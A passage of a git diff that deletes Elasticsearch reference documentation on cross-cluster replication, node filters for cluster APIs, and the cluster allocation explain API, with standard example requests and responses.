9c936cd9f4b..00000000000 Binary files a/docs/reference/ccr/images/ccr-arch-bi-directional.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-arch-central-reporting.png b/docs/reference/ccr/images/ccr-arch-central-reporting.png deleted file mode 100644 index 55f50af5604..00000000000 Binary files a/docs/reference/ccr/images/ccr-arch-central-reporting.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-arch-chain-dcs.png b/docs/reference/ccr/images/ccr-arch-chain-dcs.png deleted file mode 100644 index 042a8185c75..00000000000 Binary files a/docs/reference/ccr/images/ccr-arch-chain-dcs.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-arch-data-locality.png b/docs/reference/ccr/images/ccr-arch-data-locality.png deleted file mode 100644 index a2b67b07284..00000000000 Binary files a/docs/reference/ccr/images/ccr-arch-data-locality.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-arch-disaster-recovery.png b/docs/reference/ccr/images/ccr-arch-disaster-recovery.png deleted file mode 100644 index 244c71910ff..00000000000 Binary files a/docs/reference/ccr/images/ccr-arch-disaster-recovery.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-arch-multiple-dcs.png b/docs/reference/ccr/images/ccr-arch-multiple-dcs.png deleted file mode 100644 index 2a2fd05a007..00000000000 Binary files a/docs/reference/ccr/images/ccr-arch-multiple-dcs.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-follower-index.png b/docs/reference/ccr/images/ccr-follower-index.png deleted file mode 100644 index dee64c5272c..00000000000 Binary files a/docs/reference/ccr/images/ccr-follower-index.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-tutorial-clusters.png b/docs/reference/ccr/images/ccr-tutorial-clusters.png deleted file mode 100644 index ef1fff4dc13..00000000000 
Binary files a/docs/reference/ccr/images/ccr-tutorial-clusters.png and /dev/null differ diff --git a/docs/reference/ccr/images/remote-clusters.jpg b/docs/reference/ccr/images/remote-clusters.jpg deleted file mode 100644 index a843320c231..00000000000 Binary files a/docs/reference/ccr/images/remote-clusters.jpg and /dev/null differ diff --git a/docs/reference/ccr/index.asciidoc b/docs/reference/ccr/index.asciidoc deleted file mode 100644 index 5adf860e9d0..00000000000 --- a/docs/reference/ccr/index.asciidoc +++ /dev/null @@ -1,302 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[xpack-ccr]] -== {ccr-cap} -With {ccr}, you can replicate indices across clusters to: - -* Continue handling search requests in the event of a datacenter outage -* Prevent search volume from impacting indexing throughput -* Reduce search latency by processing search requests in geo-proximity to the -user - -{ccr-cap} uses an active-passive model. You index to a _leader_ index, and the -data is replicated to one or more read-only _follower_ indices. Before you can add a follower index to a cluster, you must configure the _remote cluster_ that contains the leader index. - -When the leader index receives writes, the follower indices pull changes from -the leader index on the remote cluster. You can manually create follower -indices, or configure auto-follow patterns to automatically create follower -indices for new time series indices. - -You configure {ccr} clusters in a uni-directional or bi-directional setup: - -* In a uni-directional configuration, one cluster contains only -leader indices, and the other cluster contains only follower indices. -* In a bi-directional configuration, each cluster contains both leader and -follower indices. - -In a uni-directional configuration, the cluster containing follower indices -must be running **the same or newer** version of {es} as the remote cluster. -If newer, the versions must also be compatible as outlined in the following matrix. - -[%collapsible] -[[ccr-version-compatibility]] -.Version compatibility matrix -==== -include::../modules/remote-clusters.asciidoc[tag=remote-cluster-compatibility-matrix] -==== - -[discrete] -[[ccr-multi-cluster-architectures]] -=== Multi-cluster architectures -Use {ccr} to construct several multi-cluster architectures within the Elastic -Stack: - -* <> in case a primary cluster fails, -with a secondary cluster serving as a hot backup -* <> to maintain multiple copies of the -dataset close to the application servers (and users), and reduce costly latency -* <> for minimizing network -traffic and latency in querying multiple geo-distributed {es} clusters, or for -preventing search load from interfering with indexing by offloading search to a -secondary cluster - -Watch the -https://www.elastic.co/webinars/replicate-elasticsearch-data-with-cross-cluster-replication-ccr[{ccr} webinar] to learn more about the following use cases. -Then, <> on your local machine and work -through the demo from the webinar. - -[discrete] -[[ccr-disaster-recovery]] -==== Disaster recovery and high availability -Disaster recovery provides your mission-critical applications with the -tolerance to withstand datacenter or region outages. This use case is the -most common deployment of {ccr}. 
You can configure clusters in different -architectures to support disaster recovery and high availability: - -* <> -* <> -* <> -* <> - -[discrete] -[[ccr-single-datacenter-recovery]] -===== Single disaster recovery datacenter -In this configuration, data is replicated from the production datacenter to the -disaster recovery datacenter. Because the follower indices replicate the leader -index, your application can use the disaster recovery datacenter if the -production datacenter is unavailable. - -image::images/ccr-arch-disaster-recovery.png[Production datacenter that replicates data to a disaster recovery datacenter] - -[discrete] -[[ccr-multiple-datacenter-recovery]] -===== Multiple disaster recovery datacenters -You can replicate data from one datacenter to multiple datacenters. This -configuration provides both disaster recovery and high availability, ensuring -that data is replicated in two datacenters if the primary datacenter is down -or unavailable. - -In the following diagram, data from Datacenter A is replicated to -Datacenter B and Datacenter C, which both have a read-only copy of the leader -index from Datacenter A. - -image::images/ccr-arch-multiple-dcs.png[Production datacenter that replicates data to two other datacenters] - -[discrete] -[[ccr-chained-replication]] -===== Chained replication -You can replicate data across multiple datacenters to form a replication -chain. In the following diagram, Datacenter A contains the leader index. -Datacenter B replicates data from Datacenter A, and Datacenter C replicates -from the follower indices in Datacenter B. The connection between these -datacenters forms a chained replication pattern. - -image::images/ccr-arch-chain-dcs.png[Three datacenters connected to form a replication chain] - -[discrete] -[[ccr-bi-directional-replication]] -===== Bi-directional replication -In a https://www.elastic.co/blog/bi-directional-replication-with-elasticsearch-cross-cluster-replication-ccr[bi-directional replication] setup, all clusters have access to view -all data, and all clusters have an index to write to without manually -implementing failover. Applications can write to the local index within each -datacenter, and read across multiple indices for a global view of all -information. - -This configuration requires no manual intervention when a cluster or datacenter -is unavailable. In the following diagram, if Datacenter A is unavailable, you can continue using Datacenter B without manual failover. When Datacenter A -comes online, replication resumes between the clusters. - -image::images/ccr-arch-bi-directional.png[Bi-directional configuration where each cluster contains both a leader index and follower indices] - -NOTE: This configuration is useful for index-only workloads, where no updates -to document values occur. In this configuration, documents indexed by {es} are -immutable. Clients are located in each datacenter alongside the {es} -cluster, and do not communicate with clusters in different datacenters. - -[discrete] -[[ccr-data-locality]] -==== Data locality -Bringing data closer to your users or application server can reduce latency -and response time. This methodology also applies when replicating data in {es}. -For example, you can replicate a product catalog or reference dataset to 20 or -more datacenters around the world to minimize the distance between the data and -the application server. - -In the following diagram, data is replicated from one datacenter to three -additional datacenters, each in their own region. 
The central datacenter -contains the leader index, and the additional datacenters contain follower -indices that replicate data in that particular region. This configuration -puts data closer to the application accessing it. - -image::images/ccr-arch-data-locality.png[A centralized datacenter replicated across three other datacenters, each in their own region] - -[discrete] -[[ccr-centralized-reporting]] -==== Centralized reporting -Using a centralized reporting cluster is useful when querying across a large -network is inefficient. In this configuration, you replicate data from many -smaller clusters to the centralized reporting cluster. - -For example, a large global bank might have 100 {es} clusters around the world -that are distributed across different regions for each bank branch. Using -{ccr}, the bank can replicate events from all 100 banks to a central cluster to -analyze and aggregate events locally for reporting. Rather than maintaining a -mirrored cluster, the bank can use {ccr} to replicate specific indices. - -In the following diagram, data from three datacenters in different regions is -replicated to a centralized reporting cluster. This configuration enables you -to copy data from regional hubs to a central cluster, where you can run all -reports locally. - -image::images/ccr-arch-central-reporting.png[Three clusters in different regions sending data to a centralized reporting cluster for analysis] - -[discrete] -[[ccr-replication-mechanics]] -=== Replication mechanics -Although you <> at the index level, {es} -achieves replication at the shard level. When a follower index is created, -each shard in that index pulls changes from its corresponding shard in the -leader index, which means that a follower index has the same number of -shards as its leader index. All operations on the leader are replicated by the -follower, such as operations to create, update, or delete a document. -These requests can be served from any copy of the leader shard (primary or -replica). - -When a follower shard sends a read request, the leader shard responds with -any new operations, limited by the read parameters that you establish when -configuring the follower index. If no new operations are available, the -leader shard waits up to the configured timeout for new operations. If the -timeout elapses, the leader shard responds to the follower shard that there -are no new operations. The follower shard updates shard statistics and -immediately sends another read request to the leader shard. This -communication model ensures that network connections between the remote -cluster and the local cluster are continually in use, avoiding forceful -termination by an external source such as a firewall. - -If a read request fails, the cause of the failure is inspected. If the -cause of the failure is deemed to be recoverable (such as a network -failure), the follower shard enters into a retry loop. Otherwise, the -follower shard pauses -<>. - -When a follower shard receives operations from the leader shard, it places -those operations in a write buffer. The follower shard submits bulk write -requests using operations from the write buffer. If the write buffer exceeds -its configured limits, no additional read requests are sent. This configuration -provides a back-pressure against read requests, allowing the follower shard -to resume sending read requests when the write buffer is no longer full. - -To manage how operations are replicated from the leader index, you can -configure settings when -<>. 
- -The follower index automatically retrieves some updates applied to the leader -index, while other updates are retrieved as needed: - -[cols="3"] -|=== -h| Update type h| Automatic h| As needed -| Alias | {yes-icon} | {no-icon} -| Mapping | {no-icon} | {yes-icon} -| Settings | {no-icon} | {yes-icon} -|=== - -For example, changing the number of replicas on the leader index is not -replicated by the follower index, so that setting might not be retrieved. - -NOTE: You cannot manually modify a follower index's mappings or aliases. - -If you apply a non-dynamic settings change to the leader index that is -needed by the follower index, the follower index closes itself, applies the -settings update, and then re-opens itself. The follower index is unavailable -for reads and cannot replicate writes during this cycle. - -[discrete] -[[ccr-remote-recovery]] -=== Initializing followers using remote recovery -When you create a follower index, you cannot use it until it is fully -initialized. The _remote recovery_ process builds a new copy of a shard on a -follower node by copying data from the primary shard in the leader cluster. - -{es} uses this remote recovery process to bootstrap a follower index using the -data from the leader index. This process provides the follower with a copy of -the current state of the leader index, even if a complete history of changes -is not available on the leader due to Lucene segment merging. - -Remote recovery is a network intensive process that transfers all of the Lucene -segment files from the leader cluster to the follower cluster. The follower -requests that a recovery session be initiated on the primary shard in the -leader cluster. The follower then requests file chunks concurrently from the -leader. By default, the process concurrently requests five 1MB file -chunks. This default behavior is designed to support leader and follower -clusters with high network latency between them. - -TIP: You can modify dynamic <> -to rate-limit the transmitted data and manage the resources consumed by remote -recoveries. - -Use the <> on the cluster containing the follower -index to obtain information about an in-progress remote recovery. Because {es} -implements remote recoveries using the -<> infrastructure, running remote -recoveries are labelled as type `snapshot` in the recovery API. - -[discrete] -[[ccr-leader-requirements]] -=== Replicating a leader requires soft deletes -{ccr-cap} works by replaying the history of individual write -operations that were performed on the shards of the leader index. {es} needs to -retain the -<> on the leader -shards so that they can be pulled by the follower shard tasks. The underlying -mechanism used to retain these operations is _soft deletes_. - -A soft delete occurs whenever an existing document is deleted or updated. By -retaining these soft deletes up to configurable limits, the history of -operations can be retained on the leader shards and made available to the -follower shard tasks as it replays the history of operations. - -The <> setting defines the -maximum time to retain a shard history retention lease before it is -considered expired. This setting determines how long the cluster containing -your leader index can be offline, which is 12 hours by default. If a shard copy -recovers after its retention lease expires, then {es} will fall back to copying -the entire index, because it can no longer replay the missing history. - -Soft deletes must be enabled for indices that you want to use as leader -indices. 
Soft deletes are enabled by default on new indices created on
or after {es} 7.0.0.

// tag::ccr-existing-indices-tag[]
IMPORTANT: {ccr-cap} cannot be used on existing indices created using {es}
7.0.0 or earlier, where soft deletes are disabled. You must
<> your data into a new index with soft deletes
enabled.

// end::ccr-existing-indices-tag[]

[discrete]
[[ccr-learn-more]]
=== Use {ccr}
The following sections provide more information about how to configure
and use {ccr}:

* <>
* <>
* <>
* <>

include::getting-started.asciidoc[]
include::managing.asciidoc[]
include::auto-follow.asciidoc[]
include::upgrading.asciidoc[]
diff --git a/docs/reference/ccr/managing.asciidoc b/docs/reference/ccr/managing.asciidoc
deleted file mode 100644
index bb07375a172..00000000000
--- a/docs/reference/ccr/managing.asciidoc
+++ /dev/null
@@ -1,164 +0,0 @@
[role="xpack"]
[testenv="platinum"]

//////////////////////////

[source,console]
--------------------------------------------------
PUT /follower_index/_ccr/follow?wait_for_active_shards=1
{
  "remote_cluster" : "remote_cluster",
  "leader_index" : "leader_index"
}
--------------------------------------------------
// TESTSETUP
// TEST[setup:remote_cluster_and_leader_index]

[source,console]
--------------------------------------------------
POST /follower_index/_ccr/pause_follow
--------------------------------------------------
// TEARDOWN

//////////////////////////

[[ccr-managing]]
=== Manage {ccr}
Use the following information to manage {ccr} tasks, such as inspecting
replication progress, pausing and resuming replication, recreating a follower
index, and terminating replication.

[[ccr-access-ccr]]
To start using {ccr}, access {kib} and go to
*Management > Stack Management*. In the side navigation, select
*Cross-Cluster Replication*.

[[ccr-inspect-progress]]
==== Inspect replication statistics
To inspect the progress of replication for a follower index and view
detailed shard statistics, <> and choose the *Follower indices* tab.

Select the name of the follower index you want to view replication details
for. The slide-out panel shows settings and replication statistics for the
follower index, including read and write operations that are managed by the
follower shard.

To view more detailed statistics, click *View in Index Management*, and
then select the name of the follower index in Index Management.
Open the tabs for detailed statistics about the follower index.

[%collapsible]
.API example
====
Use the <> to inspect replication
progress at the shard level. This API provides insight into the reads and writes
managed by the follower shard. The API also reports read exceptions that can be
retried and fatal exceptions that require user intervention.
====

[[ccr-pause-replication]]
==== Pause and resume replication
To pause and resume replication of the leader index, <> and choose the *Follower indices* tab.

Select the follower index you want to pause and choose *Manage > Pause Replication*. The follower index status changes to Paused.

To resume replication, select the follower index and choose
*Resume replication*.

[%collapsible]
.API example
====
You can pause replication with the
<> and then later resume
replication with the <>.
Using these APIs in tandem enables you to adjust the read and write parameters
on the follower shard task if your initial configuration is not suitable for
your use case.
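The following is a minimal sketch of that workflow, assuming the
`follower_index` created in the setup above; the parameter values are only
illustrative and are not tuning recommendations.

[source,console]
--------------------------------------------------
POST /follower_index/_ccr/pause_follow

POST /follower_index/_ccr/resume_follow
{
  "max_outstanding_read_requests" : 16,
  "read_poll_timeout" : "30s"
}
--------------------------------------------------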
-==== - -[[ccr-recreate-follower-index]] -==== Recreate a follower index -When a document is updated or deleted, the underlying operation is retained in -the Lucene index for a period of time defined by the -<> parameter. You configure -this setting on the <>. - -When a follower index starts, it acquires a retention lease from -the leader index. This lease informs the leader that it should not allow a soft -delete to be pruned until either the follower indicates that it has received -the operation, or until the lease expires. - -If a follower index falls sufficiently behind a leader and cannot -replicate operations, {es} reports an `indices[].fatal_exception` error. To -resolve the issue, recreate the follower index. When the new follow index -starts, the <> process recopies the -Lucene segment files from the leader. - -IMPORTANT: Recreating the follower index is a destructive action. All existing -Lucene segment files are deleted on the cluster containing the follower index. - -To recreate a follower index, -<> and choose the -*Follower indices* tab. - -[role="screenshot"] -image::images/ccr-follower-index.png["The Cross-Cluster Replication page in {kib}"] - -Select the follower index and pause replication. When the follower index status -changes to Paused, reselect the follower index and choose to unfollow the -leader index. - -The follower index will be converted to a standard index and will no longer -display on the Cross-Cluster Replication page. - -In the side navigation, choose *Index Management*. Select the follower index -from the previous steps and close the follower index. - -You can then <> -to restart the replication process. - -[%collapsible] -.Use the API -==== -Use the <> to pause the replication -process. Then, close the follower index and recreate it. For example: - -[source,console] ----------------------------------------------------------------------- -POST /follower_index/_ccr/pause_follow - -POST /follower_index/_close - -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} ----------------------------------------------------------------------- -==== - -[[ccr-terminate-replication]] -==== Terminate replication -You can unfollow a leader index to terminate replication and convert the -follower index to a standard index. - -<> and choose the -*Follower indices* tab. - -Select the follower index and pause replication. When the follower index status -changes to Paused, reselect the follower index and choose to unfollow the -leader index. - -The follower index will be converted to a standard index and will no longer -display on the Cross-Cluster Replication page. - -You can then choose *Index Management*, select the follower index -from the previous steps, and close the follower index. - -[%collapsible] -.Use the API -==== -You can terminate replication with the -<>. This API converts a follower index -to a standard (non-follower) index. -==== diff --git a/docs/reference/ccr/upgrading.asciidoc b/docs/reference/ccr/upgrading.asciidoc deleted file mode 100644 index e7cf6249d5e..00000000000 --- a/docs/reference/ccr/upgrading.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-upgrading]] -=== Upgrading clusters using {ccr} -++++ -Upgrading clusters -++++ - -Clusters that are actively using {ccr} require a careful approach to upgrades. 
-The following conditions could cause index following to fail during rolling -upgrades: - -* Clusters that have not yet been upgraded will reject new index settings or -mapping types that are replicated from an upgraded cluster. -* Nodes in a cluster that has not been upgraded will reject index files from a -node in an upgraded cluster when index following tries to fall back to -file-based recovery. This limitation is due to Lucene not being forward -compatible. - -The approach to running a rolling upgrade on clusters where {ccr} is -enabled differs based on uni-directional and bi-directional index following. - -[[ccr-uni-directional-upgrade]] -==== Uni-directional index following -In a uni-directional configuration, one cluster contains only -leader indices, and the other cluster contains only follower indices that -replicate the leader indices. - -In this strategy, the cluster with follower indices should be upgraded -first and the cluster with leader indices should be upgraded last. -Upgrading the clusters in this order ensures that index following can continue -during the upgrade without downtime. - -You can also use this strategy to upgrade a -<>. Start by upgrading clusters at -the end of the chain and working your way back to the cluster that contains the -leader indices. - -For example, consider a configuration where Cluster A contains all leader -indices. Cluster B follows indices in Cluster A, and Cluster C follows indices -in Cluster B. - --- - Cluster A - ^--Cluster B - ^--Cluster C --- - -In this configuration, upgrade the clusters in the following order: - -. Cluster C -. Cluster B -. Cluster A - -[[ccr-bi-directional-upgrade]] -==== Bi-directional index following - -In a bi-directional configuration, each cluster contains both leader and -follower indices. - -When upgrading clusters in this configuration, -<> and -<> prior to -upgrading both clusters. - -After upgrading both clusters, resume index following and resume replication -of auto-follow patterns. diff --git a/docs/reference/cluster.asciidoc b/docs/reference/cluster.asciidoc deleted file mode 100644 index 1c406f0bc18..00000000000 --- a/docs/reference/cluster.asciidoc +++ /dev/null @@ -1,112 +0,0 @@ -[[cluster]] -== Cluster APIs - -["float",id="cluster-nodes"] -=== Node specification - -Some cluster-level APIs may operate on a subset of the nodes which can be -specified with _node filters_. For example, the <>, -<>, and <> APIs -can all report results from a filtered set of nodes rather than from all nodes. - -_Node filters_ are written as a comma-separated list of individual filters, -each of which adds or removes nodes from the chosen subset. Each filter can be -one of the following: - -* `_all`, to add all nodes to the subset. -* `_local`, to add the local node to the subset. -* `_master`, to add the currently-elected master node to the subset. -* a node id or name, to add this node to the subset. -* an IP address or hostname, to add all matching nodes to the subset. -* a pattern, using `*` wildcards, which adds all nodes to the subset - whose name, address or hostname matches the pattern. -* `master:true`, `data:true`, `ingest:true`, `voting_only:true`, `ml:true`, or - `coordinating_only:true`, which respectively add to the subset all - master-eligible nodes, all data nodes, all ingest nodes, all voting-only - nodes, all machine learning nodes, and all coordinating-only nodes. 
-* `master:false`, `data:false`, `ingest:false`, `voting_only:false`, `ml:false`,
- or `coordinating_only:false`, which respectively remove from the subset all
- master-eligible nodes, all data nodes, all ingest nodes, all voting-only
- nodes, all machine learning nodes, and all coordinating-only nodes.
-* a pair of patterns, using `*` wildcards, of the form `attrname:attrvalue`,
- which adds to the subset all nodes with a custom node attribute whose name
- and value match the respective patterns. Custom node attributes are
- configured by setting properties in the configuration file of the form
- `node.attr.attrname: attrvalue`.
-
-NOTE: Node filters run in the order in which they are given, which is important
-if using filters that remove nodes from the set. For example,
-`_all,master:false` means all the nodes except the master-eligible ones, but
-`master:false,_all` means the same as `_all` because the `_all` filter runs
-after the `master:false` filter.
-
-NOTE: If no filters are given, the default is to select all nodes. However, if
-any filters are given then they run starting with an empty chosen subset. This
-means that filters such as `master:false`, which remove nodes from the chosen
-subset, are only useful if they come after some other filters. When used on its
-own, `master:false` selects no nodes.
-
-NOTE: The `voting_only` role requires the {default-dist} of Elasticsearch and
-is not supported in the {oss-dist}.
-
-Here are some examples of using node filters with the
-<> APIs.
-
-[source,console]
--------------------------------------------------
-# If no filters are given, the default is to select all nodes
-GET /_nodes
-# Explicitly select all nodes
-GET /_nodes/_all
-# Select just the local node
-GET /_nodes/_local
-# Select the elected master node
-GET /_nodes/_master
-# Select nodes by name, which can include wildcards
-GET /_nodes/node_name_goes_here
-GET /_nodes/node_name_goes_*
-# Select nodes by address, which can include wildcards
-GET /_nodes/10.0.0.3,10.0.0.4
-GET /_nodes/10.0.0.*
-# Select nodes by role
-GET /_nodes/_all,master:false
-GET /_nodes/data:true,ingest:true
-GET /_nodes/coordinating_only:true
-GET /_nodes/master:true,voting_only:false
-# Select nodes by custom attribute (e.g.
with something like `node.attr.rack: 2` in the configuration file) -GET /_nodes/rack:2 -GET /_nodes/ra*:2 -GET /_nodes/ra*:2* --------------------------------------------------- - -include::cluster/allocation-explain.asciidoc[] - -include::cluster/get-settings.asciidoc[] - -include::cluster/health.asciidoc[] - -include::cluster/reroute.asciidoc[] - -include::cluster/state.asciidoc[] - -include::cluster/stats.asciidoc[] - -include::cluster/update-settings.asciidoc[] - -include::cluster/nodes-usage.asciidoc[] - -include::cluster/nodes-hot-threads.asciidoc[] - -include::cluster/nodes-info.asciidoc[] - -include::cluster/nodes-reload-secure-settings.asciidoc[] - -include::cluster/nodes-stats.asciidoc[] - -include::cluster/pending.asciidoc[] - -include::cluster/remote-info.asciidoc[] - -include::cluster/tasks.asciidoc[] - -include::cluster/voting-exclusions.asciidoc[] diff --git a/docs/reference/cluster/allocation-explain.asciidoc b/docs/reference/cluster/allocation-explain.asciidoc deleted file mode 100644 index 2bbe7e01b9b..00000000000 --- a/docs/reference/cluster/allocation-explain.asciidoc +++ /dev/null @@ -1,351 +0,0 @@ -[[cluster-allocation-explain]] -=== Cluster allocation explain API -++++ -Cluster allocation explain -++++ - -Provides explanations for shard allocations in the cluster. - - -[[cluster-allocation-explain-api-request]] -==== {api-request-title} - -`GET /_cluster/allocation/explain` - -[[cluster-allocation-explain-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-allocation-explain-api-desc]] -==== {api-description-title} - -The purpose of the cluster allocation explain API is to provide -explanations for shard allocations in the cluster. For unassigned shards, -the explain API provides an explanation for why the shard is unassigned. -For assigned shards, the explain API provides an explanation for why the -shard is remaining on its current node and has not moved or rebalanced to -another node. This API can be very useful when attempting to diagnose why a -shard is unassigned or why a shard continues to remain on its current node when -you might expect otherwise. - - -[[cluster-allocation-explain-api-query-params]] -==== {api-query-parms-title} - -`include_disk_info`:: - (Optional, Boolean) If `true`, returns information about disk usage and - shard sizes. Defaults to `false`. - -`include_yes_decisions`:: - (Optional, Boolean) If `true`, returns 'YES' decisions in explanation. - Defaults to `false`. - - -[[cluster-allocation-explain-api-request-body]] -==== {api-request-body-title} - -`current_node`:: - (Optional, string) Specifies the node ID or the name of the node to only - explain a shard that is currently located on the specified node. - -`index`:: - (Optional, string) Specifies the name of the index that you would like an - explanation for. - -`primary`:: - (Optional, Boolean) If `true`, returns explanation for the primary shard - for the given shard ID. - -`shard`:: - (Optional, integer) Specifies the ID of the shard that you would like an - explanation for. - -You can also have {es} explain the allocation of the first unassigned shard that -it finds by sending an empty body for the request. 
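
For example, sending the request with no body at all asks {es} to find the
first unassigned shard and explain why it is unassigned:

[source,console]
--------------------------------------------------
GET /_cluster/allocation/explain
--------------------------------------------------
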
- - -[[cluster-allocation-explain-api-examples]] -==== {api-examples-title} - - -////// -[source,console] --------------------------------------------------- -PUT /my-index-000001 --------------------------------------------------- -// TESTSETUP -////// - -[source,console] --------------------------------------------------- -GET /_cluster/allocation/explain -{ - "index": "my-index-000001", - "shard": 0, - "primary": true -} --------------------------------------------------- - - -===== Example of the current_node parameter - -[source,console] --------------------------------------------------- -GET /_cluster/allocation/explain -{ - "index": "my-index-000001", - "shard": 0, - "primary": false, - "current_node": "nodeA" <1> -} --------------------------------------------------- -// TEST[skip:no way of knowing the current_node] - -<1> The node where shard 0 currently has a replica on - - -===== Examples of unassigned primary shard explanations - -////// -[source,console] --------------------------------------------------- -DELETE my-index-000001 --------------------------------------------------- -////// - -[source,console] --------------------------------------------------- -PUT /my-index-000001?master_timeout=1s&timeout=1s -{ - "settings": { - "index.routing.allocation.include._name": "non_existent_node", - "index.routing.allocation.include._tier_preference": null - } -} - -GET /_cluster/allocation/explain -{ - "index": "my-index-000001", - "shard": 0, - "primary": true -} --------------------------------------------------- -// TEST[continued] - - -The API returns the following response for an unassigned primary shard: - -[source,console-result] --------------------------------------------------- -{ - "index" : "my-index-000001", - "shard" : 0, - "primary" : true, - "current_state" : "unassigned", <1> - "unassigned_info" : { - "reason" : "INDEX_CREATED", <2> - "at" : "2017-01-04T18:08:16.600Z", - "last_allocation_status" : "no" - }, - "can_allocate" : "no", <3> - "allocate_explanation" : "cannot allocate because allocation is not permitted to any of the nodes", - "node_allocation_decisions" : [ - { - "node_id" : "8qt2rY-pT6KNZB3-hGfLnw", - "node_name" : "node-0", - "transport_address" : "127.0.0.1:9401", - "node_attributes" : {}, - "node_decision" : "no", <4> - "weight_ranking" : 1, - "deciders" : [ - { - "decider" : "filter", <5> - "decision" : "NO", - "explanation" : "node does not match index setting [index.routing.allocation.include] filters [_name:\"non_existent_node\"]" <6> - } - ] - } - ] -} --------------------------------------------------- -// TESTRESPONSE[s/"at" : "[^"]*"/"at" : $body.$_path/] -// TESTRESPONSE[s/"node_id" : "[^"]*"/"node_id" : $body.$_path/] -// TESTRESPONSE[s/"transport_address" : "[^"]*"/"transport_address" : $body.$_path/] -// TESTRESPONSE[s/"node_attributes" : \{\}/"node_attributes" : $body.$_path/] - -<1> The current state of the shard. -<2> The reason for the shard originally becoming unassigned. -<3> Whether to allocate the shard. -<4> Whether to allocate the shard to the particular node. -<5> The decider which led to the `no` decision for the node. -<6> An explanation as to why the decider returned a `no` decision, with a helpful hint pointing to the setting that led to the decision. 
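
When the deciders point at an allocation filter, as in the response above, one
possible remedy is to remove or correct the offending filter with the update
index settings API. The following is only a sketch that assumes the filter
value itself is the mistake and clears it (setting a value to `null` restores
the default):

[source,console]
--------------------------------------------------
PUT /my-index-000001/_settings
{
  "index.routing.allocation.include._name": null
}
--------------------------------------------------
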
- - -The API response output for an unassigned primary shard that had previously been -allocated to a node in the cluster: - -[source,js] --------------------------------------------------- -{ - "index" : "my-index-000001", - "shard" : 0, - "primary" : true, - "current_state" : "unassigned", - "unassigned_info" : { - "reason" : "NODE_LEFT", - "at" : "2017-01-04T18:03:28.464Z", - "details" : "node_left[OIWe8UhhThCK0V5XfmdrmQ]", - "last_allocation_status" : "no_valid_shard_copy" - }, - "can_allocate" : "no_valid_shard_copy", - "allocate_explanation" : "cannot allocate because a previous copy of the primary shard existed but can no longer be found on the nodes in the cluster" -} --------------------------------------------------- -// NOTCONSOLE - - -===== Example of an unassigned replica shard explanation - -The API response output for a replica that is unassigned due to delayed -allocation: - -[source,js] --------------------------------------------------- -{ - "index" : "my-index-000001", - "shard" : 0, - "primary" : false, - "current_state" : "unassigned", - "unassigned_info" : { - "reason" : "NODE_LEFT", - "at" : "2017-01-04T18:53:59.498Z", - "details" : "node_left[G92ZwuuaRY-9n8_tc-IzEg]", - "last_allocation_status" : "no_attempt" - }, - "can_allocate" : "allocation_delayed", - "allocate_explanation" : "cannot allocate because the cluster is still waiting 59.8s for the departed node holding a replica to rejoin, despite being allowed to allocate the shard to at least one other node", - "configured_delay" : "1m", <1> - "configured_delay_in_millis" : 60000, - "remaining_delay" : "59.8s", <2> - "remaining_delay_in_millis" : 59824, - "node_allocation_decisions" : [ - { - "node_id" : "pmnHu_ooQWCPEFobZGbpWw", - "node_name" : "node_t2", - "transport_address" : "127.0.0.1:9402", - "node_decision" : "yes" - }, - { - "node_id" : "3sULLVJrRneSg0EfBB-2Ew", - "node_name" : "node_t0", - "transport_address" : "127.0.0.1:9400", - "node_decision" : "no", - "store" : { <3> - "matching_size" : "4.2kb", - "matching_size_in_bytes" : 4325 - }, - "deciders" : [ - { - "decider" : "same_shard", - "decision" : "NO", - "explanation" : "a copy of this shard is already allocated to this node [[my-index-000001][0], node[3sULLVJrRneSg0EfBB-2Ew], [P], s[STARTED], a[id=eV9P8BN1QPqRc3B4PLx6cg]]" - } - ] - } - ] -} --------------------------------------------------- -// NOTCONSOLE -<1> The configured delay before allocating a replica shard that does not exist due to the node holding it leaving the cluster. -<2> The remaining delay before allocating the replica shard. -<3> Information about the shard data found on a node. 
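
The configured delay shown above comes from the index-level delayed allocation
timeout. As an illustrative sketch (the `5m` value is arbitrary, and
`index.unassigned.node_left.delayed_timeout` is the standard delayed allocation
setting rather than anything returned by this API), you could lengthen that
delay for an index as follows:

[source,console]
--------------------------------------------------
PUT /my-index-000001/_settings
{
  "index.unassigned.node_left.delayed_timeout": "5m"
}
--------------------------------------------------
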
- - -===== Examples of allocated shard explanations - -The API response output for an assigned shard that is not allowed to remain on -its current node and is required to move: - -[source,js] --------------------------------------------------- -{ - "index" : "my-index-000001", - "shard" : 0, - "primary" : true, - "current_state" : "started", - "current_node" : { - "id" : "8lWJeJ7tSoui0bxrwuNhTA", - "name" : "node_t1", - "transport_address" : "127.0.0.1:9401" - }, - "can_remain_on_current_node" : "no", <1> - "can_remain_decisions" : [ <2> - { - "decider" : "filter", - "decision" : "NO", - "explanation" : "node does not match index setting [index.routing.allocation.include] filters [_name:\"non_existent_node\"]" - } - ], - "can_move_to_other_node" : "no", <3> - "move_explanation" : "cannot move shard to another node, even though it is not allowed to remain on its current node", - "node_allocation_decisions" : [ - { - "node_id" : "_P8olZS8Twax9u6ioN-GGA", - "node_name" : "node_t0", - "transport_address" : "127.0.0.1:9400", - "node_decision" : "no", - "weight_ranking" : 1, - "deciders" : [ - { - "decider" : "filter", - "decision" : "NO", - "explanation" : "node does not match index setting [index.routing.allocation.include] filters [_name:\"non_existent_node\"]" - } - ] - } - ] -} --------------------------------------------------- -// NOTCONSOLE -<1> Whether the shard is allowed to remain on its current node. -<2> The deciders that factored into the decision of why the shard is not allowed to remain on its current node. -<3> Whether the shard is allowed to be allocated to another node. - - -The API response output for an assigned shard that remains on its current node -because moving the shard to another node does not form a better cluster balance: - -[source,js] --------------------------------------------------- -{ - "index" : "my-index-000001", - "shard" : 0, - "primary" : true, - "current_state" : "started", - "current_node" : { - "id" : 